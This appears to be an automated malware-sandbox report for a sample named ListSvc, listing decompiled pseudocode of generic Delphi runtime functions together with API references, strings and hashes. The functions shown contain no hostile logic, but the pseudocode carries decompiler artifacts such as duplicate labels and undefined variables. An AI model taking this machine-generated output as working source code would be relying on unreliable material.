			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}

0x0041f7a0
0x0041f7a1
0x0041f7ad
0x0041f7b3
0x0041f7b9
0x0041f7bf
0x0041f7c5
0x0041f7ca
0x0041f7cb
0x0041f7d0
0x0041f7d3
0x0041f7df
0x0041f7df
0x0041f7e2
0x0041f7f0
0x0041f7f5
0x0041f7e4
0x0041f7e4
0x0041f7ff
0x0041f804
0x0041f7e6
0x0041f7e9
0x0041f80e
0x0041f813
0x0041f7eb
0x0041f81d
0x0041f822
0x0041f822
0x0041f7e9
0x0041f7e4
0x0041f82d
0x0041f840
0x0041f845
0x0041f84e
0x0041f86c
0x0041f871
0x0041f873
0x00000000
0x0041f879
0x0041f882
0x0041f888
0x0041f8a0
0x0041f8b1
0x0041f8bc
0x0041f8c2
0x0041f8cc
0x0041f8d2
0x0041f8d9
0x0041f8df
0x0041f8ec
0x0041f8f5
0x0041f8fa
0x0041f90c
0x0041f911
0x0041f915
0x0041f915
0x0041f91e
0x0041f924
0x0041f92e
0x0041f934
0x0041f93b
0x0041f941
0x0041f94e
0x0041f957
0x0041f95c
0x0041f96e
0x0041f973
0x0041f977
0x0041f97a
0x0041f97d
0x0041f988
0x0041f998
0x0041f9a5

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C

Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35

Strings

H@, xrefs: 0041F81D
@@, xrefs: 0041F80E
0@, xrefs: 0041F7F0
8@, xrefs: 0041F7FF

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: 0@$8@$@@$H@
API String ID: 902310565-4161625419
Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}

0x0040668f
0x00406691
0x00406693
0x00406696
0x00406696
0x0040669d
0x004066a4
0x00000000
0x00000000
0x004066b2
0x004066b9
0x00406751
0x00406751
0x00406751
0x00406755
0x00000000
0x00000000
0x00406760
0x00406766
0x00000000
0x00000000
0x00000000
0x00000000
0x00406768
0x00406768
0x0040676d
0x00406773
0x0040677a
0x00406784
0x00406789
0x00406790
0x00406797
0x004067a5
0x004067b3
0x004067a7
0x004067af
0x004067af
0x004067a5
0x004067b9
0x004067db
0x004067e4
0x004067e8
0x004067ec
0x00000000
0x004067bb
0x004067bb
0x004067c0
0x00000000
0x00000000
0x004067cc
0x004067d2
0x00000000
0x00000000
0x004067d4
0x00000000
0x004067d4
0x004067bb
0x004067f1
0x004067f1
0x00406800
0x00406807
0x0040680a
0x0040680a
0x00000000
0x00406800
0x00000000
0x00406751
0x004066c4
0x004066ca
0x004066d0
0x0040672c
0x0040672f
0x00000000
0x00000000
0x00406736
0x0040673e
0x00406744
0x0040674f
0x00000000
0x0040674f
0x00406746
0x00000000
0x00406746
0x00000000
0x004066d2
0x004066d5
0x00000000
0x004066e4
0x004066e4
0x004066e4
0x00000000
0x004066ed
0x004066f0
0x00000000
0x00000000
0x004066f5
0x0040671e
0x00406722
0x00406727
0x0040672a
0x00000000
0x00000000
0x00000000
0x0040672a
0x004066fe
0x00406704
0x00000000
0x00000000
0x0040670b
0x0040670e
0x00406715
0x00000000
0x00406715
0x00406811
0x0040681c

APIs

Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33

GetTickCount.KERNEL32 ref: 004066BF
GetTickCount.KERNEL32 ref: 004066D7
GetCurrentThreadId.KERNEL32 ref: 00406706
GetTickCount.KERNEL32 ref: 00406731
GetTickCount.KERNEL32 ref: 00406768
GetTickCount.KERNEL32 ref: 00406792
GetCurrentThreadId.KERNEL32 ref: 00406802

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756

Uniqueness

Uniqueness Score: -1.00%

Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87
threadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}

0x004971ac
0x004971ac
0x004971ac
0x004971ad
0x004971af
0x004971b6
0x004971bb
0x004971bd
0x004971c0
0x004971c0
0x004971c5
0x004971c7
0x004971ca
0x004971ce
0x004971cf
0x004971d4
0x004971d7
0x004971de
0x004971e3
0x004971e9
0x004971ee
0x004971f6
0x004971fa
0x004971fa
0x004971fa
0x004971fc
0x00497203
0x00497284
0x0049728c
0x00497205
0x00497209
0x0049722c
0x0049723e
0x0049720b
0x00497211
0x00497224
0x00497224
0x00497245
0x00497251
0x00497259
0x0049725c
0x00497266
0x00497273
0x00497278
0x00497278
0x00497245
0x00497291
0x00497294
0x00497297
0x004972a4

APIs

GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247

Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A

GetCurrentThread.KERNEL32 ref: 0049727F
GetCurrentThreadId.KERNEL32 ref: 00497287

Strings

XtI, xrefs: 00497214, 0049722F
0@G, xrefs: 0049726E
l@, xrefs: 00497266

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$Current$CreateErrorLast
String ID: 0@G$XtI$l@
API String ID: 3539746228-385768319
Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799

Uniqueness

Uniqueness Score: -1.00%

Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}

0x00406425
0x00406427
0x0040642c
0x00406446
0x004064d9
0x004064d9
0x00000000
0x0040644c
0x0040644c
0x0040644f
0x00406450
0x00406452
0x00406459
0x00000000
0x00406465
0x0040646d
0x00406472
0x00406473
0x00406478
0x0040647b
0x00406481
0x00406485
0x00406486
0x0040648b
0x00406492
0x004064bc
0x004064be
0x004064c1
0x004064c4
0x004064d1
0x00406494
0x00406494
0x004064af
0x004064b2
0x004064ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004064ba
0x004064a5
0x004064a8
0x004064e0
0x004064e6
0x004064e6
0x00406492
0x00406459
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B

Strings

kernel32.dll, xrefs: 00406434
@, xrefs: 004064D9
GetLogicalProcessorInformation, xrefs: 0040642F

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}

0x004076c0
0x00407726
0x00407728
0x0040772a
0x0040772f
0x00407734
0x00407736
0x00407736
0x0040773c
0x004076c2
0x004076cb
0x004076db
0x004076db
0x004076f7
0x0040770a
0x0040771e
0x0040771e

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

Error, xrefs: 0040772A
Runtime error at 00000000, xrefs: 004076EA, 0040772F

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E

Uniqueness

Uniqueness Score: -1.00%

Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}

0x00420532
0x0042055f
0x00420564
0x00420569
0x00420573
0x00420534
0x00420544
0x00420549
0x0042054e
0x0042054e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559

Strings

NTDLL.DLL, xrefs: 00420554
CompareStringOrdinal, xrefs: 00420534
RtlCompareUnicodeString, xrefs: 0042054F
kernel32.dll, xrefs: 00420539

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
API String ID: 1883125708-3870080525
Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E

Uniqueness

Uniqueness Score: -1.00%

Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}

0x0042931c
0x00429328
0x0042932e
0x00429334
0x00429344
0x0042934b
0x0042934b
0x00429356
0x00429364
0x004294ef
0x004294f6
0x004294f7
0x00000000
0x0042936a
0x0042936d
0x0042938b
0x0042936f
0x0042937a
0x0042937a
0x0042939a
0x004293a6
0x004293a9
0x00429416
0x0042941c
0x0042941d
0x00429423
0x00429424
0x00429426
0x0042942b
0x0042942f
0x00429431
0x00429431
0x0042943c
0x00429447
0x00429452
0x0042945b
0x0042945e
0x0042947a
0x00429481
0x0042948c
0x004294a3
0x004294a8
0x004294bc
0x004294c1
0x004294d4
0x004294d4
0x004294dd
0x00429460
0x00429460
0x00429461
0x00429467
0x0042946d
0x0042946f
0x00429471
0x00429474
0x00429477
0x00429477
0x0042947a
0x00000000
0x00000000
0x00000000
0x0042947a
0x004293ab
0x004293ab
0x004293ac
0x004293ae
0x004293b4
0x004293b6
0x004293c5
0x004293c6
0x004293d0
0x004293d1
0x004293d6
0x004293e1
0x004293e2
0x004293ec
0x004293ed
0x004293f2
0x0042940d
0x0042940f
0x00429410
0x00429413
0x00429413
0x00000000
0x004293b4
0x004293a9

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
VariantCopy.OLEAUT32(?,?), ref: 004294F7

Memory Dump Source

